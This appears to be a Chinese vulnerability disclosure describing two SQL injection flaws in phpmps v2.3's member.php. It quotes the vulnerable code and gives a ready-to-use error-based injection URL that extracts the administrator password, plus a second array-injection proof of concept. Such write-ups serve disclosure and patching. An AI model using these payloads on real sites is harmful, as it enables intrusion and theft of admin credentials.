phpmps_v2.3最新版两处SQL注入漏洞

member.php 422 - 455 [php] case 'exchange': $units = array('gold'=>'枚', 'money'=>'元', 'credit'=>'分'); $types = array('money'=>'资金', 'gold'=>'信息币', 'credit'=>'积分'); $notes = array('login'=>'登陆积分', 'post_info_credit'=>'发布信息积分' ,'post_comment_credit'=>'发布评论积分' ,'info_refer'=>'一键更新信息' ,'info_top'=>'信息置顶' , 'credit2gold'=>'积分兑换信息币', 'money2gold'=>'资金购买信息币'); extract($_REQUEST); $page = isset($page) ? intval($page) : 1; $pagesize = 20; $sql = ''; if($type) $sql .= " AND type='$type' "; if($begindate) { $begintime = strtotime($begindate.' 00:00:00'); $sql .= " AND addtime>=$begintime "; } if($enddate) { $endtime = strtotime($enddate.' 23:59:59'); $sql .= " AND addtime<=$endtime"; } $r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql"); $pager['search'] = array('act' => 'exchange'); $pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize); $exchanges = array(); $result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]"); while($r = $db->fetchrow($result)) { $r['unit'] = $units[$r['type']]; $r['type'] = $types[$r['type']]; $r['note'] = !empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note']; $r['addtime'] = date('Y-m-d h:i:s', $r['addtime']); $exchanges[] = $r; } $seo['title'] = '交易详情'; include template('member_exchange'); break; [/php] 上面的代码使用了extract($_REQUEST); 导致我们可以覆盖任意变量,通过覆盖变量$table可以构造注入 利用如下: [php] http://www.0day5.com/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%201=1%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28select%20password%20from%20phpmps_admin%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 [/php] SQL漏洞2: member.php 741 - 746 SQL http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a [php] case 'delete': $id = is_array($_REQUEST['id']) ? join(',', $_REQUEST['id']) : intval($_REQUEST['id']); if(empty($id))showmsg('没有选择记录'); $db->query("DELETE FROM {$table}comment WHERE id IN ($id)"); showmsg('删除成功', 'member.php?act=info_comment'); break; [/php] 这里没有考虑$id为数组的情况,当提交数组的时候可以注入。 如:http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a

发表评论